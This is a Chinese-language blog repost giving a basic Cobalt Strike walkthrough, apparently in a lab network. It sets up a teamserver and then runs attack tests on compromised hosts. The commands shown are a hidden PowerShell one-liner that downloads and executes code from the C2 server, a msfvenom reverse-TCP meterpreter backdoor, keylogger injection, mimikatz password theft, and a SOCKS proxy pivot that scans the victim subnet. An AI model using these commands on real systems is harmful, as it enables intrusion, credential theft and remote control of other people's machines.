我是靠谱客的博主 魔幻飞鸟,最近开发中收集的这篇文章主要介绍cobaltstrike基本使用,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

server安装(Ubuntu18.04) 

服务器: 192.168.1.173     test/magic123

1准备java环境

apt install default-jre

apt install openjdk-11-jre-headless

2.启动服务

chmod 755 teamserver

./teamserver IP Passwd

3.启动客户端

环境  windows7   192.168.1.154   Song/123456

3.1准备好java环境

管理员权限运行.bat,输入serverIP和密码(用户名自定义)

 

 A攻击测试:powershell无文件攻击

1.制作无文件后门(此处是powershell无文件后门)

 

或者

 

 制作一句话执行后门,比如

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.173:82/'))"

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.173:80/atest'))"

2.去肉鸡上cmd执行这句powershell,和cobaltstrike建立连接,进行提权操作

 

3.列出进程列表,选择一个进程注入,执行keylogger

 

4.利用cs上的minikatz进行密码获取

 

B攻击测试:exe集成后门

制作后门msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.25  LPORT=4444 -f exe > shell.exe

kali攻击端

 

提权后(进入meterpreter)

执行shell

执行systeminfo

C.artifact.exe敏感文件后门测试

直接生成后门,上传到肉鸡上

D.socket网络代理后门测试

1.在cobaltstrike已有的beacon上建立socket代理

 

2.在攻击机上(kali)配置socket4(或者socket5)的IP和端口

vim /etc/proxychains.conf

3.在攻击机器上进行肉鸡所在网段的扫描

proxychains nmap -sP 192.168.1.0/24

 

最后

以上就是魔幻飞鸟为你收集整理的cobaltstrike基本使用的全部内容,希望文章能够帮你解决cobaltstrike基本使用所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(69)

评论列表共有 0 条评论

立即
投稿
返回
顶部